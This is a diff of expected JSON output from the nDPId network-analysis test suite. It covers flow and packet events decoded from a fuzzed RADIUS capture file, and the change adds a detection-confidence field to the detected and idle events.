 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1528998585019,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528998585019,"pkt":"ABRP+4rqcNuYVcUnCABFAADhD9lAAPwRdvHG4hk1CgxAHgcUWBAAzQh\/C7gAxWTiZLZdO+cme7xhCKfM6MYBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6d2Q6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAADyCxcI7XkaT0UFvUk8tJ2YAgUAAMJakSoc8QAAT38LtnrvLnGLAQACCwUAADQNzAWg+MfiRgxSS6PGeYdQEs5faleq8GPWzRgEVPv2RUo="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01357{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1528998585268,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528998585268,"pkt":"AAAMB6xAABRP+4rqCABFAALHIWdAAP8RAAAKDEAexuIZNXIQBxQCswAAAbkCqwwIsTK62hmv9RZW9\/f12AIaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq5ATUwMzExNDgwMjUwODY0NjKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00718{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528998585453,"pkt":"ABRP+4rqcNuYVcUnCABFADUwD91AAPwRQ57G4hk1CgxAHgcUchABHJkzArkBFPuMuhZj3jbkVosdPxLeAO4aCwAAV8gbBVNQQxpuAAABNxA0w9JZoXWsZGeHUoYiJ9p40yJPEfSCC1VPuzQcz\/tcT9Zniiv93vAfl8Sqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1528998605741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"ts_msec":1528998605741,"pkt":"AAAMB6xAABRP+4rqCABFAAKRIWpAAP8RAAAKDEAexuIZNXIQBxUCfQAABLwCddn+cEnhcqnQe5pr1rrJmHQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODgwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIsIDViMjJhYWM5L2YwOjc5OjYwOmQxOjdkOjM3LzI0NDEGAAAAExoxAAAACQErYXVkaXQtc2Vzc2lvbi1pZD0xMGZmMTBhWTAwMPowMGQ1YzlhYTIyNWItBgAAAAFABgAAAA1BBl4AAAZRBDU2NwZbIqrNGhQAAFfIBw5WWldDMlRlc3RMYWIaCgAAV8gIBEVUGhAAAFfICgpTdGFuZGFyZBoQAABXyAsKVGVzdCBMYWIaCQAAV8gPAzEaCgAAV8gQBE5KGhEAAFfIEQtMeW5kaHVyc3QaDAAAV8gSBgAAAMkaFwAAV8gdEVZaVyBDMiBUZXN0IExhYhoLAABXyCUFVnpXGg2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1528998605816,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"ts_msec":1528998605816,"pkt":"ABRP+4rqcNuYVcUnCABFAACF321AAPwRdKvG4hk1CgxAHgcVUhAAcX0pBbwAafRaWCO5QhnkLZA61WpkFeUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBZZXR3b3JrLm9yZywgNWIyMmFhYzkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjQ0"}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":600000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1528998636010,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1528998636010,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998636010,"pkt":"ABRP+4rqcNuYVcUnCABFAAClEJJAAPslAHTG4hk1CgxAHgcUchAAkT3yC70AiXLX5bK1bcbjOxq4bylP028BNTAzMTE0ODAyMxg1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZyxiNWIyMmFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1Tw4BAAAMFwwAAAxRf\/xQEvTT2\/+5xTPwYXYdoAWLt9A="}
 01225{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2064,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"ts_msec":1528998636143,"pkt":"AAAMB6xAABRP+4rqCBBFAAKrIWxAAP8RAAAKDEAexuIZNXIQBxQClwAAAb4Cj8yIFnOZ6cZavy+ov11X2XMaCgAAV8gOBKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2064}
 01226{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":22528,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"ts_msec":1528998639586,"pkt":"AAAMB6xAABRP+4rqWABFAAKrIW5AAP8RAAAKCEAexuIZNXIQBxQClwAAAcACj3BXfw4b3GMlZswG9bQoL7gaCgAAV8gOBFVTGgwAAFfIDQZXaWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqrvATUwMzExNDgwMjMyNTY4NjMxQHdsYW4ubW5jNDkwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLXAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJESthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDZlYmFhMjI1YiwgNWIybWFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2T2cCAAAIbQwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhdWAFfIHRFWWlcgQzIgVGVzdDdMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERcAAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASZHVbxXaB7Y4HBclkU5O1hA=="}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":22528}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528998557233,"flow_last_seen":1528998557443,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1358,"flow_avg_l4_payload_len":679,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528998557233,"flow_last_seen":1528998557443,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":1358,"flow_avg_l4_payload_len":679,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
